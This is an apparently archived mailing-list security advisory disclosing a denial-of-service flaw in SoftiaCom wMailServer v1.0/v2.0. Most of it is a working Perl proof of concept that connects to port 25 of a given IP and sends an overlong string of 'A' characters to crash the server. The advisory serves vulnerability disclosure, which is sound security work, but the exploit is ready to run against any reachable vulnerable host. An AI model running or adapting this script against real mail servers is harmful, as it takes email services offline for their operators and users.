<<< Date Index >>>     <<< Thread Index >>>

SoftiaCom MailServer v2.0 - Denial Of Service



SoftiaCom MailServer v2.0 - Denial Of Service

Software: wMailServer
Corporation: SoftiaCom Software
Version: v1.0 (v2.0 is the same...)
Vulnerability: Denial of Service


------------------------------------------


BACKGROUND
__________


SoftiaCom design and build software utilities in communication and network 
server.

WMailserver is an internet email server able to listin in the appropriate mail 
port
to fetch incoming emails from the net. You can add users and manage them, avoid 
spam.


Source: www.softiacom.com



Proof of Concept
________________


#!/usr/bin/perl
# -----------------------------------------------------
# Vulnerability: Denial Of Service - Crash
# Discovered on: July 9, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# -----------------------------------------------------

$boulet = $ARGV[0];

use IO::Socket;
print "\n\nSoftiaCom Software - wMailServer v1.0\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
if(!$ARGV[0]) {
die "Utilisation: ./wms_poc.pl <ip>\n";
}

print "[ ] Connexion sur $boulet\n";
my($suckette) = "";
if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => 
"25",Proto => "TCP"))
{
print $suckette " " . "\x41" x 539 . "\r\n";
print "[ ] Emission du paquet malicieux ...\n";
sleep 2;
close $suckette;
print "[ ] Mission termin&#233;e !\n\n";
}
else
{
print "[-] Impossible de se connecter sur $boulet\n";
}